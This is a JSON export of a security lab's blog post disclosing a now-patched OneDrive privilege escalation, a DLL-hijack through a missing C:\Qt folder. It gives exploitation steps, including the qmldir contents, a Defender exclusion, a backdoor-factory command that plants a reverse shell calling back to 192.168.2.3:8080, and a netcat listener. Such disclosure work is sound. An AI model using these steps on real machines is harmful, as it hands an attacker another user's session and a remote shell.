{"id":97,"date":"2020-04-27T07:30:02","date_gmt":"2020-04-27T07:30:02","guid":{"rendered":"http:\/\/labs.redyops.com\/?p=97"},"modified":"2021-10-06T06:40:52","modified_gmt":"2021-10-06T06:40:52","slug":"onedrive-privilege-of-escalation","status":"publish","type":"post","link":"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/","title":{"rendered":"OneDrive < 20.073 Escalation of Privilege"},"content":{"rendered":"<div class=\"addtoany_shortcode\"><div class=\"a2a_kit a2a_kit_size_32 addtoany_list\" data-a2a-url=\"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/\" data-a2a-title=\"OneDrive &lt; 20.073 Escalation of Privilege\"><a class=\"a2a_button_copy_link\" href=\"https:\/\/www.addtoany.com\/add_to\/copy_link?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Copy Link\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_twitter\" href=\"https:\/\/www.addtoany.com\/add_to\/twitter?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Twitter\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_facebook\" href=\"https:\/\/www.addtoany.com\/add_to\/facebook?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Facebook\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_linkedin\" href=\"https:\/\/www.addtoany.com\/add_to\/linkedin?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"LinkedIn\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_whatsapp\" href=\"https:\/\/www.addtoany.com\/add_to\/whatsapp?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"WhatsApp\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_viber\" href=\"https:\/\/www.addtoany.com\/add_to\/viber?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Viber\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_facebook_messenger\" href=\"https:\/\/www.addtoany.com\/add_to\/facebook_messenger?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Messenger\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_telegram\" href=\"https:\/\/www.addtoany.com\/add_to\/telegram?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Telegram\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_skype\" href=\"https:\/\/www.addtoany.com\/add_to\/skype?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Skype\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_sms\" href=\"https:\/\/www.addtoany.com\/add_to\/sms?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Message\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_dd addtoany_share_save addtoany_share\" href=\"https:\/\/www.addtoany.com\/share\"><\/a><\/div><\/div>\n\n\n\n<h1 class=\"wp-block-heading\"><strong>Summary<\/strong><\/h1>\n\n\n\n<p><strong>Assigned CVE<\/strong>: Microsoft has publicly acknowledged and patched the issue. However, when we asked for the CVE number, Microsoft replied to us that the purpose of a CVE is to advise customers on the security risk and how to take action to protect themselves. Microsoft issues CVEs for MS products that require users to take action to update their environments .  Although we have seen CVEs for OneDrive in the past, we respect their decision not to issue a CVE number. <\/p>\n\n\n\n<p><strong>Known to Neurosoft\u2019s RedyOps Labs since<\/strong>: 31\/03\/2020<\/p>\n\n\n\n<p><strong>Exploit<\/strong>&nbsp;<strong>Code<\/strong>:&nbsp;<a href=\"https:\/\/github.com\/RedyOpsResearchLabs\/OneDrive-PrivEsc\" target=\"_blank\" aria-label=\"undefined (opens in a new tab)\" rel=\"noreferrer noopener\">https:\/\/github.com\/RedyOpsResearchLabs\/OneDrive-PrivEsc <\/a><\/p>\n\n\n<p><strong>Vendor\u2019s Acknowledgement<\/strong> : <a href=\"https:\/\/portal.msrc.microsoft.com\/en-us\/security-guidance\/researcher-acknowledgments-online-services\">https:\/\/portal.msrc.microsoft.com\/en-us\/security-guidance\/researcher-acknowledgments-online-services<\/a> (March 2020)<\/p>\n<p><strong>Important note regarding the patch<\/strong>:&nbsp; Ensure that you have OneDrive &gt;= 20.073. If you don&#8217;t, you can download the Rolling out version of the Production Ring (<a class=\"ocpExternalLink\" href=\"https:\/\/go.microsoft.com\/fwlink\/?linkid=860984\" target=\"_blank\" rel=\"noopener noreferrer\">20.084.0426.0007<\/a>), from this link&nbsp; <a href=\"https:\/\/go.microsoft.com\/fwlink\/?linkid=860984\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/go.microsoft.com\/fwlink\/?linkid=860984&nbsp;<\/a><\/p>\n\n\n<p>An Escalation of Privileges (EoP) exists in OneDrive &lt; 20.073. The latest version we tested is  OneDrive 19.232.1124.0012&nbsp;and Insider Preview version 20.052.0311.0010&nbsp;. The exploitation of this EoP ,  gives the ability to a user with low privileges to gain access as any other user. In order for the exploitation to be successful, the targeted user must interact with the OneDrive (e.g right click on the tray icon) in order for the attacker to gain access .<\/p>\n\n\n\n<h1 class=\"wp-block-heading\"><strong>Description<\/strong><\/h1>\n\n\n\n<p>The vulnerability arises because the OneDrive is missing some QT folders and tries to locate them from C:\\QT. The C:\\QT folder does not exist by default and any user with low privileges can create it. If an attacker creates the file C:\\Qt\\Qt-5.11.1\\qml\\QtQuick.2.7\\qmldir with the following contents:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>module QtQuick \nplugin qtquick2plugin \nclassname QtQuick2Plugin \ntypeinfo plugins.qmltypes \ndesignersupported<\/code><\/pre>\n\n\n\n<p>The OneDrive will try to load the C:\\Qt\\Qt-5.11.1\\qml\\QtQuick.2.7\\<strong>qtquick2plugin.dll<\/strong> . As far as the attacker can place a backdoor in the qtquick2plugin.dll , the OneDrive will load the backdoor.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\"><strong>Exploitation<\/strong><\/h1>\n\n\n\n<p>The exploit can be found in our GitHub.<\/p>\n\n\n\n<p>Today, the provided backdoor is being detected by Defender. Bypassing Defender is not the scope of this blog-post. Our purpose is not to bypass the defender AV but to provide a Proof of Concept (PoC) of the EoP. Thus first add an exception to the Defender for the folder C:\\QT (or for the provided backdoor file qtquick2plugin.dll )<\/p>\n\n\n\n<ol><li>Login as a low privileged user<\/li><li>Close your OneDrive<\/li><li>Copy paste the provided QT folder under the C: drive. After the copy paste, you should have the following files in your system:<\/li><\/ol>\n\n\n\n<ul><li>C:\\Qt\\Qt-5.11.1\\qml\\QtQuick.2.7\\qtquick2plugin.dll (This the qtquick2plugin.dll in which we have added a backdoor for reverse shell) <\/li><li>C:\\Qt\\Qt-5.11.1\\qml\\QtQuick.2.7\\qmldir <\/li><li>C:\\Qt\\Qt-5.11.1\\qml\\QtQuick.2.7\\qtquick2plugin.dll.org (this file is not needed. It&#8217;s the original qtquick2plugin.dll file.<\/li><\/ul>\n\n\n\n<p>In order for the exploitation to take place, the victim must login into the system and interact with the OneDrive. If you want to verify the exploitation perform the following:<\/p>\n\n\n\n<ol><li>Logout<\/li><li>Login as another user. For example perform a login as an Administrator.<\/li><li>Right click on the tray icon of the OneDrive<\/li><li>You should receive a reverse shell from the Administrator to your C2C.<\/li><\/ol>\n\n\n\n<p>The provided qtquick2plugin.dll contains a reverse shell which has been configured to return to the ip address 192.168.2.3 and port 8080 .<\/p>\n\n\n\n<h1 class=\"wp-block-heading\"><strong>Supporting materials<\/strong><\/h1>\n\n\n\n<p>In order to backdoor the qtquick2plugin.dll , we used the following:<\/p>\n\n\n\n<ol><li>The original file qtquick2plugin.dll (you can find one under the folder &#8220;C:\\Users\\youruser\\AppData\\Local\\Microsoft\\OneDrive\\19.232.1124.****\\qml\\QtQuick.2\\&#8221; )<\/li><li>the the-backdoor-factory from https:\/\/github.com\/secretsquirrel\/the-backdoor-factory<\/li><li>Create the backdoor with the following command line: <\/li><\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>\n.\/backdoor.py -f qtquick2plugin.dll -H ip -P port -s reverse_shell_tcp_inline -a<\/code><\/pre>\n\n\n\n<p>Wait for the reverse shell with a netcat &#8220;nc -nlvp port&#8221;<\/p>\n\n\n\n<h1 class=\"wp-block-heading\"><strong>Video PoC<\/strong><\/h1>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"OneDrive EoP\" width=\"525\" height=\"295\" src=\"https:\/\/www.youtube.com\/embed\/3SCfATAjRSE?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n<div class=\"addtoany_shortcode\"><div class=\"a2a_kit a2a_kit_size_32 addtoany_list\" data-a2a-url=\"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/\" data-a2a-title=\"OneDrive &lt; 20.073 Escalation of Privilege\"><a class=\"a2a_button_copy_link\" href=\"https:\/\/www.addtoany.com\/add_to\/copy_link?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Copy Link\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_twitter\" href=\"https:\/\/www.addtoany.com\/add_to\/twitter?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Twitter\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_facebook\" href=\"https:\/\/www.addtoany.com\/add_to\/facebook?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Facebook\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_linkedin\" href=\"https:\/\/www.addtoany.com\/add_to\/linkedin?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"LinkedIn\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_whatsapp\" href=\"https:\/\/www.addtoany.com\/add_to\/whatsapp?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"WhatsApp\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_viber\" href=\"https:\/\/www.addtoany.com\/add_to\/viber?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Viber\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_facebook_messenger\" href=\"https:\/\/www.addtoany.com\/add_to\/facebook_messenger?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Messenger\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_telegram\" href=\"https:\/\/www.addtoany.com\/add_to\/telegram?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Telegram\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_skype\" href=\"https:\/\/www.addtoany.com\/add_to\/skype?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Skype\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_button_sms\" href=\"https:\/\/www.addtoany.com\/add_to\/sms?linkurl=https%3A%2F%2Flabs.redyops.com%2Findex.php%2F2020%2F04%2F27%2Fonedrive-privilege-of-escalation%2F&amp;linkname=OneDrive%20%3C%2020.073%20Escalation%20of%20Privilege\" title=\"Message\" rel=\"nofollow noopener\" target=\"_blank\"><\/a><a class=\"a2a_dd addtoany_share_save addtoany_share\" href=\"https:\/\/www.addtoany.com\/share\"><\/a><\/div><\/div>\n\n\n\n<h1 class=\"wp-block-heading\"><strong>Resources<\/strong><\/h1>\n\n\n\n<p><strong>GitHub<\/strong><\/p>\n\n\n\n<p>You can find the exploit code in our Github at&nbsp;<a href=\"https:\/\/github.com\/RedyOpsResearchLabs\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/RedyOpsResearchLabs\/<\/a><\/p>\n\n\n\n<p><strong>RedyOps team<\/strong><\/p>\n\n\n\n<p>RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.<\/p>\n\n\n\n<p>You can find RedyOps team at&nbsp;<a href=\"https:\/\/redyops.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/redyops.com\/<\/a><\/p>\n\n\n\n<p><strong>Angel<\/strong><\/p>\n\n\n\n<p>Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel\u2019s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel\u2019s entire network.<\/p>\n\n\n\n<p>You can find Angel team at&nbsp;<a href=\"https:\/\/angelcyber.gr\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/angelcyber.gr\/<\/a><\/p>\n\n\n\n<p><strong>Illicium<\/strong><\/p>\n\n\n\n<p>Our 0-days cannot win Illicium. Today\u2019s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers\u2019 evolution, defenders now have a new kind of weapon in their arsenal: Deception.<\/p>\n\n\n\n<p>You can find Illicium team at&nbsp;<a href=\"https:\/\/deceivewithillicium.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/deceivewithillicium.com\/<\/a><\/p>\n\n\n\n<p><strong>Neutrify<\/strong><\/p>\n\n\n\n<p>Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft\u2019s 24\u00d77 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.<\/p>\n\n\n\n<p>You can find Neutrify team at&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/neurosoft.gr\/contact\/\" target=\"_blank\">https:\/\/neurosoft.gr\/contact\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Summary Assigned CVE: Microsoft has publicly acknowledged and patched the issue. However, when we asked for the CVE number, Microsoft replied to us that the purpose of a CVE is to advise customers on the security risk and how to take action to protect themselves. Microsoft issues CVEs for MS products that require users to &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;OneDrive < 20.073 Escalation of Privilege\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":true,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[17,4],"tags":[3,5,6],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>OneDrive &lt; 20.073 Escalation of Privilege - REDYOPS Labs<\/title>\n<meta name=\"description\" content=\"Exploit Code and WriteUp for OneDrive &lt; 20.073 Escalation of Privilege .\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"OneDrive &lt; 20.073 Escalation of Privilege\" \/>\n<meta property=\"og:description\" content=\"Exploit Code and WriteUp for OneDrive &lt; 20.073 Escalation of Privilege .\" \/>\n<meta property=\"og:url\" content=\"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/\" \/>\n<meta property=\"og:site_name\" content=\"REDYOPS Labs\" \/>\n<meta property=\"article:published_time\" content=\"2020-04-27T07:30:02+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-10-06T06:40:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/labs.redyops.com\/wp-content\/uploads\/2020\/04\/onedrive.png\" \/>\n\t<meta property=\"og:image:width\" content=\"666\" \/>\n\t<meta property=\"og:image:height\" content=\"602\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"OneDrive &lt; 20.073 Escalation of Privilege\" \/>\n<meta name=\"twitter:description\" content=\"Exploit Code and WriteUp for OneDrive &lt; 20.073 Escalation of Privilege .\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/labs.redyops.com\/wp-content\/uploads\/2020\/04\/onedrive.png\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/\",\"url\":\"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/\",\"name\":\"OneDrive < 20.073 Escalation of Privilege - REDYOPS Labs\",\"isPartOf\":{\"@id\":\"https:\/\/labs.redyops.com\/#website\"},\"datePublished\":\"2020-04-27T07:30:02+00:00\",\"dateModified\":\"2021-10-06T06:40:52+00:00\",\"author\":{\"@id\":\"https:\/\/labs.redyops.com\/#\/schema\/person\/b71c37b49c3ccdc96f0095d5e4161b69\"},\"description\":\"Exploit Code and WriteUp for OneDrive &lt; 20.073 Escalation of Privilege .\",\"breadcrumb\":{\"@id\":\"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/labs.redyops.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"OneDrive < 20.073 Escalation of Privilege\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/labs.redyops.com\/#website\",\"url\":\"https:\/\/labs.redyops.com\/\",\"name\":\"REDYOPS Labs\",\"description\":\"Blog\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/labs.redyops.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/labs.redyops.com\/#\/schema\/person\/b71c37b49c3ccdc96f0095d5e4161b69\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/labs.redyops.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/c7bde3be8234c04475e6f42bb697f356?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/c7bde3be8234c04475e6f42bb697f356?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/labs.redyops.com\"],\"url\":\"https:\/\/labs.redyops.com\/index.php\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"OneDrive < 20.073 Escalation of Privilege - REDYOPS Labs","description":"Exploit Code and WriteUp for OneDrive &lt; 20.073 Escalation of Privilege .","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/","og_locale":"en_US","og_type":"article","og_title":"OneDrive &lt; 20.073 Escalation of Privilege","og_description":"Exploit Code and WriteUp for OneDrive &lt; 20.073 Escalation of Privilege .","og_url":"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/","og_site_name":"REDYOPS Labs","article_published_time":"2020-04-27T07:30:02+00:00","article_modified_time":"2021-10-06T06:40:52+00:00","og_image":[{"width":666,"height":602,"url":"https:\/\/labs.redyops.com\/wp-content\/uploads\/2020\/04\/onedrive.png","type":"image\/png"}],"author":"admin","twitter_card":"summary_large_image","twitter_title":"OneDrive &lt; 20.073 Escalation of Privilege","twitter_description":"Exploit Code and WriteUp for OneDrive &lt; 20.073 Escalation of Privilege .","twitter_image":"https:\/\/labs.redyops.com\/wp-content\/uploads\/2020\/04\/onedrive.png","twitter_misc":{"Written by":"admin","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/","url":"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/","name":"OneDrive < 20.073 Escalation of Privilege - REDYOPS Labs","isPartOf":{"@id":"https:\/\/labs.redyops.com\/#website"},"datePublished":"2020-04-27T07:30:02+00:00","dateModified":"2021-10-06T06:40:52+00:00","author":{"@id":"https:\/\/labs.redyops.com\/#\/schema\/person\/b71c37b49c3ccdc96f0095d5e4161b69"},"description":"Exploit Code and WriteUp for OneDrive &lt; 20.073 Escalation of Privilege .","breadcrumb":{"@id":"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/labs.redyops.com\/index.php\/2020\/04\/27\/onedrive-privilege-of-escalation\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/labs.redyops.com\/"},{"@type":"ListItem","position":2,"name":"OneDrive < 20.073 Escalation of Privilege"}]},{"@type":"WebSite","@id":"https:\/\/labs.redyops.com\/#website","url":"https:\/\/labs.redyops.com\/","name":"REDYOPS Labs","description":"Blog","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/labs.redyops.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/labs.redyops.com\/#\/schema\/person\/b71c37b49c3ccdc96f0095d5e4161b69","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/labs.redyops.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/c7bde3be8234c04475e6f42bb697f356?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c7bde3be8234c04475e6f42bb697f356?s=96&d=mm&r=g","caption":"admin"},"sameAs":["http:\/\/labs.redyops.com"],"url":"https:\/\/labs.redyops.com\/index.php\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/labs.redyops.com\/index.php\/wp-json\/wp\/v2\/posts\/97"}],"collection":[{"href":"https:\/\/labs.redyops.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labs.redyops.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labs.redyops.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/labs.redyops.com\/index.php\/wp-json\/wp\/v2\/comments?post=97"}],"version-history":[{"count":23,"href":"https:\/\/labs.redyops.com\/index.php\/wp-json\/wp\/v2\/posts\/97\/revisions"}],"predecessor-version":[{"id":331,"href":"https:\/\/labs.redyops.com\/index.php\/wp-json\/wp\/v2\/posts\/97\/revisions\/331"}],"wp:attachment":[{"href":"https:\/\/labs.redyops.com\/index.php\/wp-json\/wp\/v2\/media?parent=97"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labs.redyops.com\/index.php\/wp-json\/wp\/v2\/categories?post=97"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labs.redyops.com\/index.php\/wp-json\/wp\/v2\/tags?post=97"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}